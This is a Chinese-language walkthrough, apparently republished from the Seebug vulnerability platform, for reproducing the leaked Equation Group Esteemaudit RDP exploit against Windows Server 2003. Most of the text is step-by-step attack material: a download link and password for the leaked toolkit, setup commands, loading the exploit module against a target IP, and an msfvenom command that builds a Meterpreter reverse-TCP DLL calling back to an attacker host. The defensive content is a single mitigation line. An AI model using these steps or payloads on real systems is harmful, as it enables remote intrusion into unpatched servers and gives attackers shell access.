前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞

方程式组织泄露windows框架漏洞工具Esteemaudit RDP 漏洞

作者头像
Seebug漏洞平台
发布2018-03-30 10:13:32
1.7K0
发布2018-03-30 10:13:32
举报
文章被收录于专栏:Seebug漏洞平台

1.复现环境:

• windows2003 sp2 x86

• windows2003 配置域服务器

2.环境搭建:

从 https://yadi.sk/d/NJqzpqo_3GxZA4下载本次泄露的文件

在 linux下通过密码: Reeeeeeeeeeeeeee 和以下命令解压这三个文件

$ gpg windows.tar.xz.gpg

gpg: AES 加密过的数据

请输入密码:

$ tar xvf windows.tar.xz

本次泄露的众多 Exploit都存放在 windows文件夹下。将 windows文件夹拷贝到windows电脑下。

在 windows下操作步骤如下:

1. 关闭 windows防火墙

2. 下载并安装 python2.6(https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi)

3. 将 python添加至环境变量中

4. 下载并安装

Pywin2.6(https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/pywin32-221.win32-py2.6.exe/download)

5. 进入 windows文件夹,在命令行下输入 mkdir listeningposts,接着运行 python fb.py 即可开始攻击

3. 漏洞利用:

我们这里运行 python fb.py,首先创建一个工程:

然后输入 use Esteemaudit加载 Esteemaudit 模块:

在这里我们选择目标架构,设置目标 IP和端口,设置完成后即可执行对目标的检测:

然后我们选择callback模式,选择对应的系统版本和callbackport:

到这里我们已经检测到目标服务器存在漏洞

这里检测到目标存在漏洞,接下来我们使用 Pcdlllauncher 来进行漏洞利用

这里我们需要用msfvenom 生成一个漏洞利用的DLL:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f dll > rdp.dll

然后载入生成的 dll文件

配置完毕 执行payload

这里我们可以在metasploit里看到 shell已经回显了

4.漏洞防护措施

到目前为止官方没有发布任何该漏洞的补丁,为保证系统安全,建议关闭智能卡登录。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-04-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Seebug漏洞平台 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档